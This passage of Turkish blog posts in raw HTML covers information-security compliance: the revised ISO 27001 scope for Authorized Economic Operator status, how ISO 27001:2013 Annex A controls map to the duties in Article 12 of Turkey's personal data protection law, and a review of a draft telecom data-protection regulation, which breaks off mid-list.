varlıkları korumak amacıyla kullandığı güvenlik önlemlerini,</span></i></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;"><span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">kapsamalı ve bu faaliyetlerin
yürütüldüğü tüm idari bina ve tesislere ilişkin olarak alınmış olmalıdır.”</span></i></b></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">Revize edilen kapsamda değerlendirilmesi
gereken faaliyetler <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">gümrük ve dış ticaret işlemlerini ve bu işlemlerine ilişkin lojistik,
depolama, muhasebe, finans ve bilgi işlem faaliyetleri </i></b>olarak revize
edilmiştir. Eski kapsam ifadesine ek olarak <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">kapsam dahilindeki faaliyetlerin yürütüldüğü
tüm idari bina ve tesislerin </i></b>de kapsama dahil edilmesi<b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;"> </i></b>gerektiği
eklenmiştir. Ayrıca eski kapsam ifadesinde geçen <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">elektronik bilgi varlıklarını
kapsar </i></b>ifadesi; <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">bilgi varlıkları</i></b> olarak revize
edilmiştir. Böylece elektronik olmayan bilgi varlıklarının da kapsama alınıp
alınmaması hususu da netleştirilmiştir. Yetkilendirilmiş Yükümlülük Statüsü
kapsamında ISO 27001 Bilgi güvenliği Yönetim Sistemi belgelendirme sürecini
tamamlamış veya belgelendirilme sürecine henüz girecek firmalar, bu değişikliği
göz önüne alarak kapsam çalışmalarını gözden geçirmelidir.</span></div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-29827005627599186712017-10-27T14:00:00.000+03:002017-10-27T14:00:06.222+03:00KİŞİSEL VERİLERİN KORUNMASI KONUSUNDA UYGULANABİLECEK BİLGİ GÜVENLİĞİ KONTROLLERİ<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Günlük hayatımızda
teknolojiyi kullanma yatkınlığımız her geçen gün artmaktadır. Bu eğilim
içerisinde yaşamımızda önemli bir rol oynamaya başlayan Bilgi Güvenliği terimi
ön plana çıkmaktadır. Bilgi Güvenliğini doğru şekilde sağlamaya yönelik
kaygıların sadece günümüzün problemi olduğunu düşünüyorsanız yanılıyorsunuz
demektir. Çünkü içinde bulunduğumuz çağda önce sunucuların daha sonra kişisel
bilgisayarların arkasından Internet’in devamında mobil cihazların ve son olarak
nesnelerin internetinin ortaya çıkmasıyla her dönemde güvenlik kaygıları oluşmuştur.
Dahası, Bilgi Güvenliği çağımızda yaşanan bu gelişmelerin de dışında mazisi
milattan önceye varan örnekleri içermektedir. Bu örneklerin en eskilerinden
biri; önemli yazışmaların ve metinlerin gizliliğinin korunabilmesi amacıyla
kriptografik yöntemlerle şifrelenerek (bkz. Sezar şifresi) iletilmesidir. Bilgi
güvenliği terimi bilginin <b>gizlilik</b> <i>“bilginin yetkisiz kişilere ifşasını
engellemek”</i> olduğu kadar <b>bütünlük</b>
<i>“yetkisiz değişimleri engelleyerek
tamlığını ve doğruluğunu korumak”</i> ve <b>erişilebilirlik</b>
<i>“ihtiyaç duyulduğunda kullanılabilir
olması”</i> özelliklerini de sağlamaya yöneliktir. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Yaşadığımız çağda
gündemi bilgi güvenliği kadar işgal eden diğer bir konu ise mahremiyettir.
Mahremiyet, kişinin kendisine ve yaşam alanına müdahale edilmemesi ya da
kendine ait bilgilerin bilinmesini istemediği kişilerden soyutlanması olarak
tanımlanabilir. Kişiyi tanımlayan bilgiler kimlik numarası, müşteri numarası
olabileceği gibi sağlık, cinsel hayat, adli sicil kaydı gibi hassas veriler de
olabilmektedir. Mahremiyetin ana motivasyonunun kişiye ait bilgilere yetkisiz
kişilerin erişmemesidir. Özetle mahremiyet kavramında gizliliğin önemli bir
faktör olduğu ifade edilebilir. Bu faktöre ek olarak Kişisel Verilerin
Korunmasını düzenleyen ulusal ve uluslararası mevzuatlarda kişisel verilerin
işlenebilmesi için “Doğru ve gerektiğinde güncel olma” ilkesi yer almaktadır.
Bu nedenle “bilginin bütünlüğü”nün de korunması gereken bir başka faktör olduğu
anlaşılmaktadır. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span lang="TR">Bilgi Güvenliği Standardı<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span lang="TR"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Bilgi Güvenliğinin
sistematik bir biçimde uygulanabilmesi amacıyla ISO/IEC 27001 Bilgi Güvenliği Yönetim
Sistemi Standardı 2005 yılında yayınlanmıştır. Bu standart 2013 yılında
revizyona uğrayarak güncel olarak kullanılan haline kavuşmuştur. Standart,
uygulanacak yönetim sistemini tarif etmekle birlikte, Ek-A bölümünde yer alan 14
alanda 114 teknik güvenlik kontrolü de içermektedir. Bu kontroller uygulanırken
dikkat edilecek iyi uygulama tavsiyeleri ISO/IEC 27002:2013 Uygulama Pratikleri
standardında tanımlanmıştır.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span lang="TR">Kanuni Düzenlemeler<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span lang="TR"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Mahremiyete ilişkin
düzenlemeler 2. Dünya Savaşı sonrasında ortaya çıkmıştır. 1948 yılında özel
hayatın gizliliğini korumaya yönelik madde (bkz. Madde 12) içeren İnsan Hakları
Evrensel Beyannamesini 1970’lerde İsveç, Almanya ve Amerika Birleşik
Devletleri’ndeki Mahremiyet yasaları izlemiştir. Avrupa Birliği’nin üyesi ve
üyelik sürecindeki ülkelerin veri koruma düzenlemelerini tanımlayan Veri Koruma
Direktifi (bkz. Data Protection Directive 95/46/EC) 1995’te yürürlüğe
girmiştir. Avrupa Birliği’nin yeni bir düzenlemesi olan General Data Protection
Regulation (GDPR) 2016 yılında kabul edilmiş ve Mayıs 2018’de yürürlüğe
girecektir. Avrupa Birliği sakini veya vatandaşlarının kişisel verisini işleyen
veri sorumlularının bu düzenlemeye uyumlu olmaları gerekmektedir. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Türkiye
Cumhuriyeti’nin mahremiyete ilişkin en kayda değer düzenlemelerinden birisi
2010 yılında Anayasa’nın 20. Maddesi olan özel hayatın gizliliğinde yapılan
değişiklikle kişisel verilerin korunmasına ilişkin maddenin eklenmesidir.
Ayrıca, Türkiye Cumhuriyeti’nde Avrupa Birliğine üyelik sürecinin bir parçası
olarak 7 Nisan 2016 tarihinde yürürlüğe giren 6698 sayılı Kişisel Verileri
Koruma Kanunu bu direktife uyumlu olarak oluşturulmuştur. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span lang="TR">ISO 27001:2005 ve ISO 27001:2013’te Kişisel Verilerin
Korunması Kontrolü<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span lang="TR"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">ISO 27001 Bilgi
Güvenliği Yönetim Sistemi Standardı 2005 sürümünde “A.15 Uyum” alanı “A.15.1
Yasal gereksinimlere uyum” kontrolünün “A.15.1.4 Veri koruma ve kişisel
bilgilerin gizliliği” detaylı teknik kontrolü altında “Uygun yasa, düzenlemeler
ve varsa anlaşma maddelerinde belirtildiği gibi veri koruma ve gizlilik
sağlanmalıdır.” olarak tanımlanmaktadır. Standardın 2013 yılında yayınlanan
güncel sürümünde “A.18 Uyum” “A.18.1 Yasal ve sözleşmeye tabi gereksinimlere
uyum” kontrolünün “A.18.1.4 Kişi tespit bilgisinin gizliliği ve korunması”
detaylı teknik kontrolü altında “Kişiyi tespit bilgisinin gizliliği ve
korunması uygulanabilen yerlerde yasa ve düzenlemeler ile sağlanmalıdır.”
olarak ifade edilmiştir. Bu kontrol, standardı uygulamak isteyen bir
organizasyonun bulunduğu ülkelerde Mahremiyet veya Kişisel Verilerin
Korunmasına ilişkin mevzuatlar veya sözleşmelerinde ilgili hükümler bulunuyorsa
uyum sağlamak zorunda olduğu anlamına gelmektedir. Örneğin, İngiltere’de 1998
yılında Veri Koruma Yasası (bkz. Data Protection Act 1998) yürürlüğe girmiştir.
İngiltere’de ISO/IEC 27001’i kılavuz alarak Bilgi Güvenliği Yönetim Sistemi
kuran kuruluşların belirttiğimiz yasaya uyumu sağlamaları zorunludur. Aynı
şekilde, kanunun ülkemizde yürürlüğe girdiği 7 Nisan 2016 tarihinden itibaren
ISO/IEC 27001 projesi gerçekleştiren kuruluşlarda artık belirttiğimiz kontrol
gereği yönetim sistemlerini kanunun gereksinimlerine uyumlu kurmaları
gerekmektedir. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span lang="TR">Kişisel Verilerin Korunması için ISO 27001:2013 EK-A’da
Bulunan Uygulanabilir Teknik Kontroller<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span lang="TR"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Kanun, veri
sahibine çeşitli haklar tanımlarken (bkz. KVKK 11. Madde) veri sorumlusu ve
veri işleyenlere yönelik olarak kişisel verilerin işlenmesi için bazı ilkeleri,
şartları ve yükümlülükleri tanımlamaktadır. Bu yükümlülüklere uymak isteyen
veri sorumluları için ISO/IEC 27001:2013 Ek-A’da yer alan uygulanabilir
kontrollerden bazılarını kanun gereksinimleri değerlendirildikten sonra
parantez içinde aşağıda tanımlayacağız. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Kanunun 12. Maddesi
“Veri güvenliğine ilişkin yükümlülükler” aşağıdaki şekilde belirtilmiştir.</span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR" style="text-indent: -18pt;"><i><br /></i></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR" style="text-indent: -18pt;"><i>(1)</i><span style="font-size: xx-small;"> </span></span><i style="text-indent: -18pt;"><span lang="TR">Veri sorumlusu; a) Kişisel verilerin hukuka aykırı olarak işlenmesini
önlemek, b) Kişisel verilere hukuka aykırı olarak erişilmesini önlemek, c)
Kişisel verilerin muhafazasını sağlamak amacıyla uygun güvenlik düzeyini temin
etmeye yönelik gerekli her türlü teknik ve idari tedbirleri almak zorundadır.</span></i></div>
<div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<i><span lang="TR"><br /></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Bu fıkrada kişisel
verilerin hukuka aykırı olarak işlenmesi genel anlamda kanunda tanımlanan
ilkelere (bkz. Madde 4) ve şartlara (bkz. Madde 5, 6, 7, 8, 9) aykırı olarak
işlenmesi olarak ifade edilebilir. Örneğin kişisel verilerin belirlenen amaç
dışında kullanılması, güncel tutulmaması, mevzuatlarda yer alan süre kadar
saklanmamaları bu aykırılıklara örnek verilebilir. Bu konular kişisel verilerin
işlenmesine özel bir yönetim yapısı, süreçler ve prosedürler tanımlanarak ve
uygulanarak yönetilebilir. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Ancak, hukuka
aykırı erişilmesini önlemek üzere uygulanabilecek birçok teknik kontrol
bulunmaktadır. ISO/IEC 27001:2013’te bu konu üzerine A.9 Erişim Kontrolü alanı
bulunmaktadır. Bu alanda bilgi varlıklarına erişim politikalarının
oluşturulması, kullanıcıların kaydedilmesi ve silinmesi süreci, erişim
haklarının verilmesi, düzenlenmesi, kaldırılması süreci ve erişim haklarının
düzenli olarak gözden geçirilmesi, güçlü parolaların kullanılması gibi
kontroller bulunmaktadır. <o:p></o:p></span><br />
<span lang="TR"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Diğer taraftan
kişisel verilere sadece yetkili kişilerin erişiminin sağlanabilmesi amacıyla A.11
Fiziksel ve çevresel güvenlik kontrolleri de uygulanabilir. Bu alanda fiziksel
güvenlik sınırları, güvenli alanlar ve bu alanlarda çalışma koşullarının
tanımlanmasının yanı sıra temiz masa temiz ekran kontrollerini de içermektedir.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Yukarıda sayılan
alan güvenlik kontrollerine ek olarak aşağıdaki bilgi güvenliği kontrollerinin
de uygulanması gereklidir.<o:p></o:p></span></div>
<ul style="margin-top: 0cm;" type="disc">
<li class="MsoNormal" style="mso-list: l0 level1 lfo2; text-align: justify;"><span lang="TR">A.13.1.3 Ağlarda ayrım: Kişisel verileri barındıran sistemler
yetkisiz erişimlerin ve sızıntının engellenmesi amacıyla farklı ağlarda
bulundurulmalıdır.<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l0 level1 lfo2; text-align: justify;"><span lang="TR">A.13.2.1 Bilgi transfer politikaları ve prosedürleri: İlgili
taraflarla kişisel verilerin paylaşımında güvenli iletimi sağlayabilmek
amacıyla kurallar tanımlanmalıdır.<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l0 level1 lfo2; text-align: justify;"><span lang="TR">A.10 Kriptografi: Kişisel verinin barındırılırken, işlenirken ve
iletilirken, gizliliğini ve bütünlüğünü sağlamak amacıyla kriptografik
kontroller uygulanmalıdır.<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l0 level1 lfo2; text-align: justify;"><span lang="TR">A.12.2.1 Kötücül yazılımlara karşı kontroller: Kişisel verilerin
sızıntısına sebep olabilecek siber olayları engellemek amacıyla zararlı
yazılımlara karşı mücadele edilmelidir.<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l0 level1 lfo2; text-align: justify;"><span lang="TR">A.12.6.1 Teknik açıklıkların yönetimi: Daha ötesinde kuruluşlar
sistemlerindeki zafiyetleri düzenli olarak belirlemeli ve kapatmalıdır.<o:p></o:p></span></li>
</ul>
<div style="text-align: justify;">
<i style="text-indent: -18pt;"><span lang="TR">(2)<span style="font-size: 7pt; font-stretch: normal; font-style: normal; font-variant-numeric: normal; line-height: normal;"> </span></span></i><i style="text-indent: -18pt;"><span lang="TR">Veri sorumlusu, kişisel verilerin kendi adına başka bir gerçek veya
tüzel kişi tarafından işlenmesi halinde, birinci fıkrada belirtilen tedbirlerin
alınması hususunda bu kişilerle birlikte müştereken sorumludur.</span></i></div>
<div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<i><span lang="TR"><br /></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">2. fıkrada veri
sorumlusunun verdiği yetkiyle kendi adına kişisel verileri işleyen gerçek veya
tüzel kişinin yani veri işleyenin yapacağı işlemlerde müştereken (eşit
derecede) sorumlu olduğu ifade edilmektedir. Bu durumda veri işleyenden
kaynaklanabilecek ihlal olaylarında Kişisel Verileri Koruma Kurulu’nun veri sorumlusunu
müştereken sorumlu tutması ve ceza vermesi söz konusu olabilir. Bu sebeple veri
işleyen tarafın performansının izlenmesi, uygulayacağı güvenlik önlemlerinin
kontrol altında tutulması ve denetlenmesi göz önünde bulundurulabilir. (bkz.
A.15.2.1 Tedarikçi hizmetlerini izleme ve gözden geçirme)<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><i><span lang="TR"> </span></i></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<i><span lang="TR"> (3)<span style="font-size: 7pt; font-stretch: normal; font-style: normal; font-variant-numeric: normal; line-height: normal;"> </span></span></i><i><span lang="TR">Veri sorumlusu, kendi kurum veya kuruluşunda, bu Kanun hükümlerinin
uygulanmasını sağlamak amacıyla gerekli denetimleri yapmak veya yaptırmak
zorundadır.</span></i></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<i style="text-indent: -18pt;"><span lang="TR"> (4)<span style="font-size: 7pt; font-stretch: normal; font-style: normal; font-variant-numeric: normal; line-height: normal;"> </span></span></i><i style="text-indent: -18pt;"><span lang="TR">Veri sorumluları ile veri işleyen kişiler, öğrendikleri kişisel
verileri bu Kanun hükümlerine aykırı olarak başkasına açıklayamaz ve işleme
amacı dışında kullanamazlar. Bu yükümlülük görevden ayrılmalarından sonra da
devam eder.</span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">4. fıkrada
çalışanların ve tedarikçilerin öğrendikleri kişisel verileri açıklayamamalarının
gizlilik ve sır saklama yükümlülüklerini ifade ettiği söylenebilir. Kuruluşlar bu
yükümlülükleri, bağlayıcı olması ve kuruluşu hukuki olarak güvence altına almak
amacıyla çalışanlarıyla istihdamın başlamasından önce imzaladıkları iş
sözleşmesinde tarif etmektedir. (bkz. A.7.1.2 İstihdam hüküm ve koşulları) <o:p></o:p></span><br />
<span lang="TR"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Diğer taraftan
benzer gizlilik ve sır saklama hükümleri tedarikçilerle imzalanan Gizlilik
Sözleşmesi veya Taahhütnamelerde ifade edilmektedir. (bkz. A.15.1.2 Tedarikçi
anlaşmalarında güvenliği ifade etme) Dikkat edilmesi gereken bir nokta ise bu
sözleşmelerin hükümlerini tarafların iş ilişkisinin başlamasından önce bilmesi
ve kabul etmesidir. <o:p></o:p></span></div>
<div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><i><span lang="TR"> </span></i></div>
<div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<i style="text-indent: -18pt;"><span lang="TR"> (5)<span style="font-size: 7pt; font-stretch: normal; font-style: normal; font-variant-numeric: normal; line-height: normal;"> </span></span></i><i style="text-indent: -18pt;"><span lang="TR">İşlenen kişisel verilerin kanuni olmayan yollarla başkaları tarafından
elde edilmesi hâlinde, veri sorumlusu bu durumu en kısa sürede ilgilisine ve
Kurula bildirir. Kurul, gerekmesi hâlinde bu durumu, kendi internet sitesinde
ya da uygun göreceği başka bir yöntemle ilan edebilir.</span></i></div>
<div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<i><span lang="TR"><br /></span></i></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">5. fıkrada kişisel
verilerin kanuni olmayan yollarla başkaları tarafından erişilmesi aslında bize
bir veri sızıntısı ya da ifşasını anlatmaktadır. Ayrıca ifşanın yaşanması
durumunda Kişisel Verileri Koruma Kurulu’na ve veri sahiplerine bildirimde
bulunmamız istenmektedir. (bkz. A.6.1.3 Otoritelerle iletişim)<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Veri sorumlusunun
kendisinin veya bir başkasının yaşadığı ihlal olayını takip etmek için
üreticilerin, uzmanların görüşlerini alması da bir ihtiyaç olarak göz önünde
bulundurulabilir. (bkz. A.6.1.4 Özel ilgi grupları ile iletişim) <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Veri sızıntısının
kim tarafından, nasıl, ne zaman gerçekleştirildiği gibi sorulara yanıt bulmak
ve tekrarlanmasını önlemek için kuruluşun aslında ihlal olayları sürecini çalıştırması
gerekmektedir ve bu konu standartta yedi alt kontrole sahip bir alanda ayrıca
ele alınmaktadır. (bkz. A.16 Bilgi güvenliği ihlal olayı yönetimi)<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">İhlal olayının
araştırılması sırasında yapılacak incelemelerde sistemlerin etkin şekilde
incelenebilmesi amacıyla tüm sistemlerin loglarının kayıt altına alınması (bkz.
A.12.4.1 Olay kaydetme) ve bu logların yetkisiz olarak değiştirilmesinin
engellenmesi sağlanmalıdır. (bkz. A.12.4.2 Kayıt bilgisinin korunması) Olayın
zamanını tespit edebilmek için sistemlerin doğru ve aynı zaman ayarlarıyla çalıştığına
dikkat edilmelidir. (bkz. A.12.4.4 Saat senkronizasyonu)<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span lang="TR">Sonuç<o:p></o:p></span></b></div>
<br />
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Ülkemizde ve
dünyada kişisel verilerin korunmasına ilişkin düzenlemeler son yılların önemli
gelişmeleri arasında yer almaktadır. Bu düzenlemelere uyum sağlamak isteyen
veri sorumluları yeni süreçler oluşturmak, var olan süreçlerini optimize etmek
için çeşitli kılavuzları kullanmaktadır. ISO/IEC 27001:2013 EK-A, kişisel
verilerin korunması için teknik önlemlerin alınması gibi zor bir probleme tek
başına çözüm olabilecek tabir-i caizse gümüş kurşun olmasa da etkili bilgi
güvenliği kontrollerini tanımlamaktadır.<o:p></o:p></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-82733323371992903602017-09-11T11:00:00.000+03:002017-09-11T11:01:31.535+03:00Elektronik Haberleşme Sektöründe Kişisel Verilerin Korunması Taslak Yönetmelik İncelemesi<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">24 Temmuz 2012
tarihinde Resmi Gazete’de yayınlanarak yürürlüğe giren ve Anayasa Mahkemesi’nin
kararıyla 26 Ocak 2015’te yürürlükten kaldırılan “<i>Elektronik Haberleşme Sektöründe Kişisel Verilerin İşlenmesi ve
Gizliliğinin Korunması Hakkında Yönetmelik</i>” Bilgi Teknolojileri ve İletişim
Kurumu (BTK) tarafından Kişisel Verilerin Korunması mevzuatında oluşan
gelişmelerin ardından tekrar düzenlendi.
Taslak düzenleme 17 Ağustos 2017 tarihinde BTK’nın web sitesi üzerinden kamuoyunun
görüşünün alınabilmesi amacıyla paylaşıldı.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR">Yönetmeliğe eklenen
maddeler incelendiğinde, bu maddelerin 7 Nisan 2016 tarihinde yürürlüğe giren
Kişisel Verilerin Korunması Kanunun etkileri olduğu görülmektedir. Taslak
Yönetmelikte yer alan değişiklikleri aşağıda bulabilirsiniz. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span lang="TR">Değişiklikler</span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
1. Dayanak bölümüne “6698 sayılı
Kişisel Verilerin Korunması Kanununa dayanılarak hazırlanmıştır.“ ifadesi
eklenmiştir.</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
2. <span lang="TR" style="text-indent: -18pt;">Tanımlar ve Kısaltmalar bölümünde
aşağıda sıralanan belirtilen tanımlar eklenmiştir.</span></div>
<ul>
<li> <span lang="TR" style="text-indent: -18pt;">Açık rıza: Belirli bir konuya
ilişkin, bilgilendirilmeye dayanan, sadece ilgili işlemle sınırlı olan ve özgür
iradeyle açıklanan rıza</span></li>
<li> IP (İnternet Protokolü): Belirli
bir ağa bağlı cihazların birbirini tanımak ve birbirleriyle iletişim kurmak
için kullandıkları protokolü</li>
<li> Zaman Damgası: 5070 sayılı
Elektronik İmza Kanunu’nun 3’üncü maddesinin (h) bendinde tanımlanan kaydı</li>
</ul>
3. Trafik verisini işleme yetkisi
maddesi, Trafik verisinin işlenmesi maddesinin 2. fıkrasıyla birleştirilmiştir.<br />
<div>
<br /></div>
<div>
4. Trafik verisinin bildirilmesi
maddesi kaldırılmıştır.</div>
<div>
<br /></div>
<div>
<span style="text-align: justify; text-indent: -18pt;">5. Konum verisini işleme yetkisi
maddesi kaldırılmıştır.</span></div>
<div>
<span style="text-align: justify; text-indent: -18pt;"><br /></span></div>
<div>
<span style="text-align: justify; text-indent: -18pt;">6. Kişisel verilerin yurtdışına
aktarılması hakkında aşağıdaki madde eklenmiştir.</span></div>
<div>
<ul>
<li>MADDE 10 - (1) 7/4/2016 tarihli ve
6698 sayılı Kişisel Verilerin Korunması Kanunu hükümleri saklı kalmak kaydıyla,
trafik ve konum verileri, ilgili kişinin açık rızası olmaksızın yurt dışına
aktarılamaz. (2) İlgili kişilerin, yurtdışına aktarılacak olan kişisel
verilerin kapsamı, yurtdışına aktarılma amacı ve süresi hakkında
bilgilendirilmelerini müteakip açık rızaları alınması ve milli güvenlik, kamu
düzeni açısından Kurumca uygun bulunmak koşuluyla trafik ve konum verileri
ilgili mevzuat hükümleri saklı kalmak kaydıyla yurt dışına aktarılabilir. (3)
Uluslararası çağrılara ilişkin bilgiler ile bazı elektronik haberleşme
hizmetlerinin sunulabilmesi için gerekli olan mobil telefon numara (MSISDN)
bilgisi teknik zorunluluk kapsamında yurt dışına çıkarılabilir.</li>
</ul>
7. Saklanacak veri kategorileri
hakkındaki maddeye aşağıdaki bölümler eklenmiştir.</div>
<div>
<ul>
<li>c) Haberleşmenin tarihi, zamanı ve
süresini belirlemek için: 1) Sabit ve mobil telefon hizmetleriyle ilgili
olarak; haberleşmenin başlangıç ile bitiş tarih ve zamanı. 2) İnternet erişimi,
elektronik posta ve internet telefonu ile ilgili olarak; internet erişimi ile
ilgili oturum açma, kapatma tarihi ve zamanı, tahsis edilen dinamik veya statik
IP adresi, NAT kullanılan şebekelerde IP adresi yanında port bilgisi,
abone/kullanıcı kimliği, elektronik posta veya internet telefonu ile ilgili
oturum açma ile kapatma tarihi ve zamanı</li>
<li><span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;"> </span><span lang="TR" style="text-align: justify; text-indent: -18pt;">(3) İşletmeci abonelerine ait
bilgileri doğru ve eksiksiz olarak saklar.</span></li>
<li>(4) İşletmeci tarafından toplu
kısa mesaj gönderimlerinde gerçek veya tüzel kişiye ait abone bilgileri
saklanır.</li>
<li>(5) Kurum tarafından gerekli
görülmesi halinde bu madde kapsamında belirtilen kategoriler dışında da
saklanacak veri kategorileri belirlenebilir.</li>
</ul>
8. <span lang="TR" style="text-align: justify; text-indent: -18pt;">İşletmecilerin veri saklama
sürelerini tanımlayan maddeye</span></div>
<div>
<ul>
<li>mevzuatlardaki süreler saklı
kalmak koşuluyla tanımlanan veri kategorilerinde haberleşmenin yapıldığı
tarihten itibaren saklama süreci bir yıldan iki yıla çıkarılmıştır.</li>
<li>kişisel verilere ve ilişkili diğer
sistemlere yapılan erişimlere ilişkin işlem kayıtları saklama süresi dört
yıldan iki yıla indirilmiştir.</li>
<li>“Kişisel verilerin işlenmesine
yönelik abonelerin/kullanıcıların açık rızalarını gösteren kayıtlar asgari
olarak abonelik süresince saklanır.” fıkrası eklenmiştir.</li>
</ul>
9. Saklanan verinin korunması ve
güvenliği hakkındaki maddede aşağıda değişiklikler yapılmıştır.</div>
<div>
<ul>
<li>Verilerin
yurt içinde saklanmasını ifadesi kaldırılmıştır.</li>
<li>İmha
işlemi kastedilerek “bu işlemlerin tutanakla veya sistemsel olarak kayıt altına
alınmasını” ifadesi “bu işlemlerin tutanakla veya elektronik ortamda zaman
damgalı olarak kayıt altına alınmasını” ile değiştirilmiştir.</li>
</ul>
10. İstatistiki bilgilerin verilmesi maddesi
taslak yönetmelikte yer almamaktadır.</div>
<div>
<br /></div>
<div style="text-align: start; text-indent: 0px;">
<span style="text-align: justify; text-indent: -18pt;">11. Otomatik çağrı yönlendirme
hakkındaki maddede yönlendirmenin ücretli olması durumunda abonenin rızası
alınır ifadesi kaldırılarak üçüncü kişilerden kendilerine gelen otomatik
yönlendirmeleri ücretsiz ve basit yöntemlerle durdurma imkânı tanınması taslak
yönetmelikte belirtilmiştir.</span></div>
<div style="text-align: start; text-indent: 0px;">
<span style="text-align: justify; text-indent: -18pt;"><br /></span></div>
<div style="text-align: start; text-indent: 0px;">
<span style="text-align: justify; text-indent: -18pt;">12. Taslak Yönetmeliğe Abonenin diğer
hakları maddesine 6698 sayılı Kişisel Verilerin Korunması Kanunu 11. Maddesinde
yer alan İlgili kişinin hakları uyarlanarak eklenmiştir.</span></div>
<div style="text-align: start; text-indent: 0px;">
<span style="text-align: justify; text-indent: -18pt;"><br /></span></div>
<div style="text-align: start; text-indent: 0px;">
